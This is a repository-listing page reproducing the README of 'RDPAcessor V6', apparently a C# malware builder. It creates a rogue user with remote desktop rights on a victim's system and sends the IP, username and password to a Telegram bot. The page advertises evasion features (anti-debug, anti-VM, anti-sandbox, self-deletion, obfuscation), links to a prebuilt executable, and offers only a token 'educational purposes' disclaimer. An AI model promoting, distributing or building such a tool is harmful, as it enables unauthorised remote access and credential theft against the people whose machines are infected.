https://github.com/k3rnel-dev/rdpacessor
Access to RDP in one click
https://github.com/k3rnel-dev/rdpacessor
hack hacking-tool malware malware-analysis malware-builder malware-research malware-tools rdp-access rdp-acessor rdp-stealer stealer
Last synced: 4 months ago
JSON representation
Access to RDP in one click
- Host: GitHub
- URL: https://github.com/k3rnel-dev/rdpacessor
- Owner: K3rnel-Dev
- License: gpl-3.0
- Created: 2024-12-31T15:18:40.000Z (9 months ago)
- Default Branch: main
- Last Pushed: 2024-12-31T15:26:28.000Z (9 months ago)
- Last Synced: 2025-03-15T11:15:24.979Z (7 months ago)
- Topics: hack, hacking-tool, malware, malware-analysis, malware-builder, malware-research, malware-tools, rdp-access, rdp-acessor, rdp-stealer, stealer
- Language: C#
- Homepage:
- Size: 1.68 MB
- Stars: 5
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# 🛠️ RDPACESSOR V6 - REBORN ( *NEW* )
>
![]()
![]()
![]()
>
### > **[⬇️ Download for Windows](https://github.com/K3rnel-Dev/RDPAcessor/releases/download/Build/RDPAcessorV6.exe)**
```diff
- to compile this project(s) visual studio 2019 or above to is required and dnlib package
```# ⚙️ About
> **A simple example** of a reworked previous project, allowing you to create a user on the end system, enable its groups of remote users and thereby send data to a telegram bot, with data inside: IP address, username and password from the created user, as well as the current RAM memory.
The project has a builder that allows you to automate the assembly of a malicious file, with various conditional interesting functions that will be included in the final compilation optionally at the request of the user himself- 🖥️ **Anti-Analysis**: Anti-Debug/VM/Process.
- 🔥 **Self-Removal (Melting)**: Removes itself from the disk after execution.
- ⚔️ **Anti-AnyRun(Working only WIN-7)**: Prevents execute on anyrun systems.
- 📷 **Mutex**: Creates a stub in the registry to prevent repeated execution on the same system.
- 🔓 **RunAsAdmin**: A special function that initiates launch on behalf of the administrator - since creating a user and adding it requires administrator rights.
- ⚙️ **Conditional Compilation**: Allows the builder to include only the features and options chosen by the user, making the final build more streamlined.
- 🔒 **Custom Renaming and Obfuscation**: Includes customizable renaming of functions and string encryption to make the code less readable and harder to analyze.## 📸 **Screens**:
> 
> ## ⚠️ **Disclaimer**:
```
This project is for educational purposes only, intended for studying malware and security techniques. The author is not responsible for any malicious use of this software.
```
# ⭐ Credits
- **Author**: @K3rnel-Dev
- **dnlib**: A library for manipulating .NET assemblies.
GitHub: [https://github.com/0xd4d/dnlib](https://github.com/0xd4d/dnlib)
---